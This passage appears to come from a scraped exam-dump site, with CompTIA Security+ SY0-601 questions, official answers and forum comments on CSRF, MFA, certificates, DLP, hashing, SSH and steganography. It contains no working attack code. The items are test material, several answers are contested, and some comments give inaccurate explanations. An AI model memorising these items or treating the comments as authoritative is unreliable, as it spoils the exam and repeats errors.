Selected Answer: D
An attacker crafts code to create an HTTP request that, if it were run in the browser of a logged in user, would do something dangerous such as
transfer money or delete data. The attacker then finds a way—typically through email—to get the malicious code into a victim’s browser.
Depending on your definition of "Broken Authentication" that could work, I just don't see this as the authentication as broken as the attacker
never logged in.
Ref: https://www.stackhawk.com/blog/what-is-cross-site-request-forgery-csrf/
upvoted 4 times

  be9z 3 months, 3 weeks ago


The answer is CSRF or XSRF. This attack can result in damaged client relationships, unauthorized fund transfers, changed passwords and data
theft—including stolen session cookies.
CSRFs are typically conducted using malicious social engineering, such as an email or link that tricks the victim into sending a forged request to
a server.
upvoted 1 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: D
XSRF or CSRF can make unauthorized requests on behalf of a victim by clicking links in emails or elements in a suspicious website.
upvoted 1 times

  abrilo 4 months, 3 weeks ago


Broken authentication attacks aim to take over one or more accounts giving the attacker the same privileges as the attacked user. Authentication
is “broken” when attackers are able to compromise passwords, keys or session tokens, user account information, and other details to assume
user identities.
upvoted 1 times

  Joe1984 5 months ago


Answer is D
upvoted 1 times

  stoneface 5 months, 1 week ago


Selected Answer: D
XSRF - see dylansmith064 answer
upvoted 3 times

  dnc1981 5 months, 1 week ago


Selected Answer: D
The link looks like its transferring money out of an account
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 16/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #9 Topic 1

A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates
that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to
prevent someone from using the exfiltrated credentials?

A. MFA

B. Lockout

C. Time-based logins

D. Password history

Correct Answer: A

Community vote distribution


A (58%) D (42%)

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
is the only one that obligate to have more info than a password to login in the system
upvoted 14 times

  Papee 3 months, 2 weeks ago


Prevent users from using the exfiltrated account. MFA would better security not prevent.
upvoted 1 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


A. MFA can limit the credentials being acquired
upvoted 1 times

  zf1343 1 week ago


Selected Answer: A
MFA: Correct. Because hacker needs to provide additional authentication factor information besides already leaked credential.
Lockout: Prevents against multiple incorrect attempts such as brute force attacks. Doesn't prevent login from leaked credentials.
Time-based logins: Normally associated with TOTP or complements as second factor authentication through email or SMS or voice.
Password history: Works in conjunction with account expiration policy to increase security. Neither will prevent a valid credential login that has
been leaked.
upvoted 1 times

  yaw255 3 weeks, 3 days ago


The answer is A MFA, not D because the same credentials BUT on different systems
upvoted 2 times

  Drealjesusfreak 4 weeks ago


It says that users tend to choose the same credentials on different systems and applications. if you use the same credentials on MFA i will still be
able to login
, but if i have password history it will not allow you to use the same credentials to login. it s a tricky one but i think its D
upvoted 1 times

  Waniey 1 month, 1 week ago


I think lockout B. Since, not use again the exfiltrated credential
upvoted 1 times

  Sezz 1 month, 1 week ago


The answer is in the Document of NIST 800-63B. The Answer is MFA. Also just think about it when you have a password history and it is set to 5
last passwords, after 5 password times maybe 30x5 or 45x5 days, criminals can use the breached credentials again. And also criminals know
that some users will inevitably cycle through older passwords, including
those that have been exposed in previous breaches. In 800-63 if an authenticator is stolen, i mean theft the only way is to prevent this MFA
upvoted 2 times

  Sezz 1 month, 1 week ago


The answer is in the Document of NIST 800-63B. The Answer is MFA. Also just think about it when you have a password history and it is set to 5
last passwords, after 5 password times maybe 30x5 or 45x5 days, criminals can use the breached credentials again. And also criminals know
that some users will inevitably cycle through older passwords, including
those that have been exposed in previous breaches. In 800-63 if an authenticator is stolen, i mean theft the only way is to prevent this MFA
upvoted 1 times

  Rockrl 1 month, 1 week ago


Selected Answer: A
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 17/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

MFA is 100% the answer the question state "prevent someone" meaning an attacker from using the exfiltrated password.
With MFA the client will need both the password and another authentication factor to gain access
upvoted 1 times
  Blachy 1 month, 1 week ago
I think it's B, why not lockout?

Account lockout policies lock out an account after a specific number of failed login attempts. This type of response helps to prevent brute force
attacks by stopping them from using repeated attempts until they can successfully log in.
upvoted 2 times

  NayaP 1 month, 2 weeks ago


Guys, why not Lockout? Can anyone explain.

"The account lockout policy “locks” the user's account after a defined number of failed password attempts. The account lockout prevents the
user from logging onto the network for a period of time even if the correct password is entered"
upvoted 3 times

  shi_ 1 week, 1 day ago


i think it is because of the words 'exfiltrated credentials' if you use lockout then it will lock the account, it can be the answer but i think for a
work the procedure cannot be implemented that easily
for me i vote A
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
The CISO should use MFA (multi-factor authentication) to prevent someone from using the exfiltrated credentials.

MFA is a security measure that requires multiple forms of authentication to access a system or data. MFA typically involves the use of two or
more of the following factors: something the user knows (e.g. a password or PIN), something the user has (e.g. a security token or smart card), or
something the user is (e.g. a biometric characteristic). By requiring multiple forms of authentication, MFA helps to prevent unauthorized access to
a system or data, even if a user's credentials are exfiltrated.

The report delivered to the CISO indicates that some user credentials could be exfiltrated, and that users tend to choose the same credentials on
different systems and applications. This means that if an attacker were to obtain a user's credentials, they could potentially use them to gain
access to multiple systems or applications. MFA would help to prevent this by requiring additional forms of authentication, making it more
difficult for an attacker to gain access to a system or data.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
It’s D
upvoted 1 times

  Heyjoem 1 month, 2 weeks ago


For sure A
upvoted 1 times

  yoyo1207 1 month, 3 weeks ago


CISO use to prevent someone from using the exfiltrated credentials?
MFA wont stop the already exfiltrated pswds from being used. They might not get in but they can still be used. Ima go with D
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


The answer would depend on who 'someone' is. If someone is the user, then password history can be the answer. But the user can always use
the same credentials on all systems, they would just be different from their previous set which would defeat the purpose.

With MFA if someone being a "malicious user" where to use the credentials, MFA would prevent their access.
upvoted 1 times

  its_melly 1 month, 3 weeks ago


Selected Answer: D
Key words "prevent using exfiltrated credentials" MFA doesn't prevent from using credentials.
Password history requires you to use a different password. Answer is D
upvoted 1 times

  its_melly 1 month, 3 weeks ago


MFA doesn't prevent you from using the same* credentials
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 18/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #10 Topic 1

A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which
are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?

A. Subject alternative name

B. Wildcard

C. Self-signed

D. Domain validation

Correct Answer: B

Community vote distribution


B (90%) 8%

  Ay_ma Highly Voted  5 months ago


Selected Answer: B
B- Wildcard SSL(Secure Sockets Layer) Certificate: Wildcard SSL certificates are for a single domain and all its subdomains.

www.cloudfare.com
upvoted 11 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
Agree with B wildcard being the correct answer here
upvoted 8 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


B. Wildcard. Helps with a main domain, with multiple subdomains on websites.
upvoted 1 times

  ShivP2 1 week ago


A. Subject alternative name (SAN) certificate would be the best option for a company with a single domain and several dozen subdomains that
are publicly accessible on the internet. SAN certificates allow a single certificate to be associated with multiple domain names, allowing the
company to secure all of its subdomains with a single certificate, simplifying the certificate management process.

A wildcard certificate would also be a valid option for a company with a single domain and several dozen subdomains that are publicly accessible
on the internet. It allows a single certificate to be associated with all subdomains of a domain, making it easy to secure all the subdomains under
one certificate. However, a Wildcard certificate would only work for subdomains and would not cover the main domain or any other domain that
is not a subdomain of the main domain, in this case if the company wants to add any other domain in the future it would require another
certificate.
upvoted 1 times

  xxxdolorxxx 2 weeks ago


Selected Answer: B
My vote goes to b.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: B
The company should implement a wildcard certificate.

A wildcard certificate is a type of digital certificate that can be used to secure multiple subdomains within a single domain. Wildcard certificates
use the wildcard character (*) in the certificate's subject alternative name (SAN) field to match any subdomain within a given domain. This allows
a single wildcard certificate to be used to secure all subdomains within the domain, simplifying the certificate management process.

The company in this case has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Implementing
a wildcard certificate would allow the company to secure all of its subdomains with a single certificate, simplifying the certificate management
process.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
Wildcard is correct
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 19/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  tek7ila 2 months, 1 week ago


Selected Answer: B
With subdomains it's always wildcard.
upvoted 2 times

  Fulmi 2 months, 1 week ago


Selected Answer: D
D- Because it´s a public DNS and should be signed by a CA. Backend or internal could be use a Wildcard but not for the internet. The biggest
concern with wildcard certificates is that when one server or sub-domain covered by the wildcard is compromised, all sub-domains may be
compromised
upvoted 1 times

  johnajwer 2 months, 2 weeks ago


Selected Answer: A
The SAN field also allows a certificate to represent different subdomains, such as www.comptia.org and members.comptia.org.

Wildcard is an easy method but not secured


upvoted 1 times

  Nirmalabhi 2 months, 3 weeks ago


Selected Answer: B
ALSO AGREED WITH B
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Wildcard - A wildcard certificate is an SSL certificate that can allow an unlimited amount of subdomains under a single domain be
encrypted by the same certificate.
==========================
Other Choices
Subject Alternative Name - Lets you specify additional host names (sites, IP addresses, common names, etc.) to be protected by a single SSL
Certificate.

Self-Signed - A Self Signed certificate are public key certificates that users issue and sign themselves instead of from a publicly trusted
Certificate Authority. These are useful for authenticating users on an internal network.

Domain Validation - SSL certificates that requires only one validation setup between the person/organization applying for the certificate and a
publicly trusted Certificate Authority who will confirm if they own the domain. Common methods for verification can be by email, file verification,
or dns verification.
upvoted 3 times

  moon971 2 months, 3 weeks ago


agree with B
upvoted 1 times

  Joe1984 5 months ago


Selected Answer: B
Wildcard
upvoted 1 times

  Boogie_79 5 months ago


Selected Answer: A
A wildcard certificate is a public key certificate used by all subdomains within a larger domain. Using a wildcard certificate on a publicly facing
web server, you can quickly secure unlimited subdomains that are all encrypted by the same certificate.
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: B
is wildcard -> *.company.com . This let you to have many url, that share the same gig domain
upvoted 4 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: B
is wildcard -> *.company.com . This let you to have many url, that share the same gig domain
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 20/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #11 Topic 1

Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?

A. DLP

B. NIDS

C. TPM

D. FDE

Correct Answer: A

Community vote distribution


A (87%) 13%

  Dachosenone Highly Voted  5 months, 1 week ago


Selected Answer: A
Data loss prevention (DLP) makes sure that users do not send sensitive or critical information outside the corporate network.
upvoted 11 times

  Fitzd Highly Voted  4 months, 2 weeks ago


Just passed, what you see is what you get.....these dissussion help a lot.....thanks guys and this site is all the luck you need
upvoted 9 times

  ELLEWOODS45 4 months, 1 week ago


DID YOU REVIEW THE OLD DUMPS OR JUST THIS ONE
I AM TRYING TO PASS 😥
, I NEED HELP 😭
upvoted 2 times

  banditring 4 months, 1 week ago


theres an old dump? I must find it. I take the exam in 2 weeks and freaking out!!
upvoted 2 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


A. DLP tracks data moving within the network, and can block the data when it is in danger of leaving the corporate network.
upvoted 1 times

  Zonas 1 week, 2 days ago


Correct Answer : A
upvoted 1 times

  Nirmalabhi 2 months, 3 weeks ago


Selected Answer: A
the answers right in front of you. option A
upvoted 1 times

  Imok 3 months, 3 weeks ago


Selected Answer: A
Data Loss Prevention
upvoted 1 times

  be9z 3 months, 3 weeks ago


FDE performs full disk encryption but it can not stop or prevent data exfiltration. The answer is A - Data Loss Prevention (DLP)
upvoted 2 times

  VendorPTS 4 months ago


Selected Answer: A
Data Loss Prevention is the clear winner here.
upvoted 1 times

  groger999 4 months, 1 week ago


Correct Answer: DLP
upvoted 2 times

  Ribeiro19 5 months ago


Selected Answer: A
it prevents data to be extracted form a corporate network.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 21/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 4 times
  comeragh 5 months ago
Selected Answer: A
DLP correct here
upvoted 2 times

  stoneface 5 months, 1 week ago


Selected Answer: D
DLP - Data Loss Prevention
upvoted 3 times

  Joe1984 5 months ago


A. DLP
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 22/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #12 Topic 1

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a
stronger preventative access control. Which of the following would BEST complete the engineer's assignment?

A. Replacing the traditional key with an RFID key

B. Installing and monitoring a camera facing the door

C. Setting motion-sensing lights to illuminate the door on activity

D. Surrounding the property with fencing and gates

Correct Answer: A

Community vote distribution


A (93%) 7%

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
B, C and D, are not a access control. So, A is the only XD
upvoted 5 times

  be9z 3 months, 3 weeks ago


A and D are access controls, however, A is the correct answer because it focuses on securing the door and not the other security perimeter of
a facility. Hence RFID protects both external (who is not supposed to have access to the building) and internal threats (staff who are not
authorised to enter the room)
upvoted 4 times

  Halaa 4 months, 4 weeks ago


they are access control
upvoted 2 times

  stoneface 5 months ago


YES, 'access control'
upvoted 2 times

  DALLASCOWBOYS Most Recent  6 days, 20 hours ago


A. Replace with an RFID Key. For B., Camera will act as a deterrent but won't prevent someone from attempting to pick lock. D Fencing, and
security gates generally people can still get around, it wont prevent them from picking the lock
upvoted 1 times

  Bobbober12 1 week, 4 days ago


All but A are monitoring solutions.
upvoted 1 times

  Sandon 1 week, 1 day ago


Not true
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Replacing the traditional key with an RFID key - For this question, there is mention of "attempts have been made to pick the door lock". Out of
the options provided, only the option to replace the current door key with an RFID key directly addresses this issue. The other options can be
viewed as preventative access control systems/ deterrents as well.
============================
Helpful Info

Preventative access control - An access control that is used to stop unwanted or unauthorized activity from occurring, these could be policies,
firewalls, physical barriers etc.

RFID (Radio Frequency Identification) - A type of key card/fob access control system that uses a radio frequency signals to communicate
between a reader and an RFID tag. You would place the tag/card near the reader and if the reader identifies the signal as belonging to an
authorized user, they will be allowed access.
upvoted 3 times

  Tomtom11 2 months, 4 weeks ago


Selected Answer: B
Is the answer not B
A preventative control is one that prevents specific actions from occurring,
such as a mantrap prevents tailgating. Preventative controls act before an

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 23/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

event, preventing it from advancing. A firewall is an example of a


preventative control, as it can block access to a specific resource.
upvoted 1 times
  Orean 3 months, 1 week ago
Selected Answer: A
The operative word is PREVENTIVE. B and C are deterrent and/or detective in nature, whereas A and D are the only preventives. D could also be
effective in this context, though I'm leaning towards A because it directly addresses the door-lock concern in question.
upvoted 2 times

  Halaa 4 months, 4 weeks ago


RFID key is more secure.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A. B,C and D are all physical controls.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 24/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #13 Topic 1

Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?

A. Hashing

B. Tokenization

C. Masking

D. Encryption

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Hashing, is the answer. Why? Because, with Hashing the tool can identify a credential without knowing the exact credential , by a mathematical
method (ex: multiply the credential by a number, and all different credentials have different results). comparing the Hashing of the local credential
with the Hashing of the web credentials the tool can extrapolate if the credential was compromised.
upvoted 18 times

  DALLASCOWBOYS Most Recent  6 days, 20 hours ago


A. Hashing
upvoted 1 times

  Deeppain90 1 week, 6 days ago


Selected Answer: A
Hashing
upvoted 1 times

  xxxdolorxxx 2 weeks, 3 days ago


Selected Answer: A
A makes the most sense to me.
upvoted 1 times

  FMMIR 2 months, 2 weeks ago


Selected Answer: A
Because, with Hashing the tool can identify a credential without knowing the exact credential, by a mathematical method (ex: multiply the
credential by a number, and all different credentials have different results). comparing the Hashing of the local credential with the Hashing of the
web credentials the tool can extrapolate if the credential was compromised.
upvoted 2 times

  okay123 2 months, 3 weeks ago


"Hashing is used to assure the authenticity of websites with which they may share personal and private information, in password storage
applications (personal or used by entities they interact with online), and is likely used by the antivirus solution they trust to keep their devices free
of malware." So if Hashing is used to validate the integrity of data, you can compare hashes to figure out if the data (password or whatever it is)
was compromised

https://www.uscybersecurity.net/csmag/what-the-hash-data-integrity-and-authenticity-in-american-jurisprudence/
upvoted 1 times

  Sultan1990 5 months ago


i thinks C.
upvoted 1 times

  Sultan1990 5 months ago


sorry A is answer
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 25/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #14 Topic 1

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific
directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be
secure. Which of the following can be used?

A. S/MIME

B. LDAPS

C. SSH

D. SRTP

Correct Answer: C

Community vote distribution


C (84%) Other

  kiosk99 Highly Voted  5 months ago


Selected Answer: C
A File Transfer Protocol (FTP) server is typically configured with several public directories, hosting files, and user accounts.
SSH FTP (SFTP)

LDAP Secure (LDAPS)—the server is installed with a digital certificate, which it uses to set up a secure tunnel for the user credential exchange.

File transfer. Answer: SSH


upvoted 8 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: SSH - SSH or (Secure Shell) is a protocol that enables two computers to communicate securely by encrypting the connection. Since the
question is looking to transfer files over the internet to a specific directory, the FTP protocol can be used for the file transfer itself. As SSH can be
used with the FTP protocol, this allows for secure(SSH) file transfer(FTP) over the internet.
========================
Other Choices:
S/MIME (Secure/Multipurpose internet Mail Extensions) - Digitally signs and encrypts the contents of email messages.
LDAPS(Lightweight Directory Access Protocol) - Provides authentication for directory-based traffic
SRTP (Secure Real-time Transport Protocol) - Provides authentication/encryption for transmitted audio and video traffic.
upvoted 7 times

  uday1985 Most Recent  3 weeks, 4 days ago


I think its D , but the messed up the letters SFTP became SRTP!

I dare you who have answered SSH to use the same answer when SFTP is next to it!
upvoted 1 times

  Moose777 3 weeks, 3 days ago


There is such thing as SRTP...
upvoted 1 times

  Mr_BuCk3th34D 1 month ago


Actually, a better answer would be SFTP (SSH with FTP), but since this is not an alternative, I'll go with SSH.
upvoted 1 times

  lordguck 3 months ago


C: LDAPS (B) is for authentication but that does not answer the question about the data transfer. SSH on the other hand can do both e.g. with
user/password or better yet certificates.
upvoted 1 times

  be9z 3 months, 3 weeks ago


The answer is SSH. SSH can be used to transfer data from one computer to another over internet. And it is a secure connection
upvoted 1 times

  RawToast 3 months, 4 weeks ago


Selected Answer: C
SSH is a suite of three utilities. SSH: Secure Shell for secure connection and command execution. SCP: Secure Copy Protocol, and slogin:
enables secure login. Both ends of an SSH connection are encrypted. SSH would allow for all of the criteria to be met.
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 26/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: C
This is definitely C.
LDAP is used to provide a central place for directory service authentication.
S/MIME is an internet standard to digitally sign and encrypt email messages. It ensures the integrity of email messages remains intact while being
received.
SSH can be used with FTP which is called SFTP, file transfer over encrypted tunnel.
upvoted 4 times

  mark9999 5 months ago


LDAPS is for directory based traffic and S/MIME for email traffic. Sending files to another server using SSH will achieve the aim. Try it out on linux
based machines.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 1 times

  Wiggie 5 months ago


LDAPS

https://library.netapp.com/ecmdocs/ECMP1366834/html/GUID-0E97E7F2-D46D-4883-B95B-A066B0D52B3D.html
upvoted 1 times

  Dachosenone 5 months ago


Selected Answer: C
You can transfer files from server to server using SSH.
https://tecadmin.net/download-file-using-ssh/
upvoted 2 times

  comeragh 5 months ago


On review it looks to be LDAPS. Other sites also saying LDAPS.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
S/MIME is the format used for email attachments, there is no way for the users to upload files to the directory and have it automatically sent to
the business partner. SSH can do this by sshing to the required directory and placing the files there. And having it sent using various ssh based
file transfer protocols like sftp, scp.
upvoted 4 times

  Wiggie 5 months ago


https://www.miniorange.com/guide-to-setup-ldaps-on-windows-server

https://www.techtarget.com/searchmobilecomputing/definition/LDAP
upvoted 2 times

  Wiggie 5 months ago


Selected Answer: B
Directory = LDAPS
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


LDAP is used as an authentication protocol for directory services.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


LDAPS is used for authentication ONLY. It does not perform any encryption of files.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: A
Going with S/MIME here for this one. It cannot be SSH. Be careful I am seeing wrong answers.
upvoted 3 times

  chuck165 5 months ago


This would be SSH via something like SCP. S/MIME is primarily for email and no way to choose a specific directory.
upvoted 3 times

  Ribeiro19 5 months ago


Guys, one question Why not SSH???
Can you send files with SSH?
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 27/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

It's based on the SSH protocol used with it. A client can use an SCP to upload files to a remote server safely, download files, or even transfer
files via SSH across remote servers.

https://www.google.com/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwiIoIH14vH5AhXFw4UKHYKRB28QFnoECBAQAw&url=https%3A%2F%2Fwww.freec
odecamp.org%2Fnews%2Fscp-linux-command-example-how-to-ssh-file-transfer-from-remote-to-
local%2F&usg=AOvVaw3r2nagt0bG8ZTEWs4LoREb&cshid=1661973013257536
upvoted 3 times

  MatterPacker 5 months ago


I also agree with you. Key phrase I see is "connection to business partner over the internet"
-It doesn't sound like S/MIME, because users are dropping the files off in a directory, not through email
-Although it mentions directory, I don't think it's LDAP. LDAP is a directory access protocol, an internal based thing for the main company,
it shouldn't extend outwards to business partners like that. https://youtu.be/0FwOcZNjjQA
upvoted 1 times

  KetReeb 5 months ago


A) Secure/Multipurpose Internet Mail Extensions - you do not use SSH for this process.
upvoted 1 times

  monsteracid 4 months, 3 weeks ago


S/MIME is used for mail exchange. This question is about centralized file storage that can securely upload to. SSH is the only correct
option of the 4 listed.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 28/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #15 Topic 1

An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the
administrator is being advised to do?

A. Perform a mathematical operation on the passwords that will convert them into unique strings.

B. Add extra data to the passwords so their length is increased, making them harder to brute force.

C. Store all passwords in the system in a rainbow table that has a centralized location.

D. Enforce the use of one-time passwords that are changed for every login session.

Correct Answer: A

Community vote distribution


A (95%) 5%

  varun0 Highly Voted  5 months ago


Selected Answer: A
A 100% sure
upvoted 9 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. is the definition of hashing
upvoted 1 times

  xxxdolorxxx 2 weeks, 3 days ago


Selected Answer: A
A.
Hashing pushes the data through a one way algorithm resulting in a string that you can use to compare against the original value.
All other answers don't really make any sense.
upvoted 1 times

  KingDrew 3 weeks, 4 days ago


Selected Answer: A
Basically a cryptography method.
upvoted 1 times

  whiteLightning0820 3 months, 1 week ago


Selected Answer: A
ITS A FO SHO
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
It is A

Option be will be salting.


upvoted 1 times

  Mondicles 4 months, 2 weeks ago


This question wants to test if you know that definition of a hash function which is described in OPTION A.
upvoted 2 times

  FT1 5 months ago


A - What's Hashing About?

By dictionary definition, hashing refers to "chopping something into small pieces" to make it look like a "confused mess". That definition closely
applies to what hashing represents in computing.

In cryptography, a hash function is a mathematical algorithm that maps data of any size to a bit string of a fixed size. We can refer to the function
input as message or simply as input. The fixed-size string function output is known as the hash or the message digest. As stated by OWASP,
hash functions used in cryptography have the following key properties:
upvoted 2 times

  dj450 5 months ago


Selected Answer: A
Admin is being advised to hash. A is the definition of hashing
upvoted 2 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 29/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Ribeiro19 5 months ago


Selected Answer: A
Guys, don't invent the wheel again. The question is stating what the told the guy to do! That us hashing. And the answer A is the definition of
hash. You can find on google
upvoted 3 times

  examprepkt 5 months ago


Seems like B would be the best option,

What is password salting? Password salting is a technique to protect passwords stored in databases by adding a string of 32 or more characters
and then hashing them. Salting prevents hackers who breach an enterprise environment from reverse-engineering passwords and stealing them
from the database.

https://www.techtarget.com/searchsecurity/definition/salt
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


Option A literally defines what a hash is. Read the question carefully.
upvoted 3 times

  stoneface 5 months ago


You are not adding any data when you are hashing - adding randomized value 'salting'
upvoted 3 times

  KetReeb 5 months ago


A - Common uses of hashing algorithms are to store computer passwords and to ensure message integrity. The idea is that hashing can produce
a unique value that corresponds to the data entered, but the hash value is also reproducible by anyone else running the same algorithm against
the data.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: B
B here for me seems the one that fits best.
upvoted 1 times

  Ay_ma 5 months ago


That's 'salting'. The question didn't indicate that anything was added to the process.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 30/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #16 Topic 1

Which of the following would be indicative of a hidden audio file found inside of a piece of source code?

A. Steganography

B. Homomorphic encryption

C. Cipher suite

D. Blockchain

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Steganography is the art of punting information inside of information. Is like hiding something in front of everyone eyes.
upvoted 8 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Steganography is the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection. It's essentially
being able to hide in plain sight. The question is referring to a hidden file not some form of encryption, Steganography is not an encryption
method but can be used with encryption to add an extra step for protecting data.

==============================
Other Choices:
Homomorphic encryption - An encryption algorithm designed to allow calculations to be performed on the encrypted data without requiring
access to a secret key to decrypt the data. The result of such a computation remains in encrypted form, and can at a later point, the original data
can be accessed with the proper decryption key. This allows critical and sensitive data to be outsourced to third-parties without posing a serious
risk to the original owner of that data.

Cipher suite - Algorithms/Instructions required to enable secure network connections between servers and clients through TLS(SSL).

Blockchain - A shared, immutable ledger that facilitates the process of recording transactions and tracking assets in a business network.
upvoted 6 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Steganography which is the art of using cryptogaphuc techniques to embed secret messages within another file.
upvoted 1 times

  KingDrew 3 weeks, 4 days ago


Selected Answer: A
Steganography = Hiding secret data within other data
In this case, secret audio file is hidden within source code data
upvoted 1 times

  batuhanzeyad 4 weeks ago


Selected Answer: A
This is the right antwort
upvoted 1 times

  mr_reyes 1 month, 3 weeks ago


Sooooo many of these are "A", and I believe it is right here also.
upvoted 1 times

  nukimoya 2 months ago


A is the right answer
upvoted 1 times

  whiteLightning0820 3 months, 1 week ago


Selected Answer: A
I think its A
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Ofcurse steganographi A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 31/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  comeragh 5 months ago
Selected Answer: A
Agree with A on this one
upvoted 1 times

  IQ30 5 months ago


Selected Answer: A
Professor Messer notes :
Other steganography types
• Audio steganography
– Modify the digital audio file
– Interlace a secret message within the audio
– Similar technique to image steganography
upvoted 2 times

Question #17 Topic 1

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen:
Please use a combination of numbers, special characters, and letters in the password field.
Which of the following concepts does this message describe?

A. Password complexity

B. Password reuse

C. Password history

D. Password age

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Password complexity - is the method that obligate users to use passwords this some characteristics. (like more than X characters, use numbers
symbols and letters) .
upvoted 8 times

  comeragh Highly Voted  5 months ago


Selected Answer: A
A correct answer here
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Making passwords more complex makes them harder to crack
upvoted 1 times

  alwaysrollin247 1 month, 4 weeks ago


CompTIA is frustrating. My first thought here is that, this user is logging in not creating an account which would tell me this is the password age
expiring. However, the question asks what the message describes which, leaving out the rest of the question, the message itself describes
complexity.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 32/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #18 Topic 1

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized
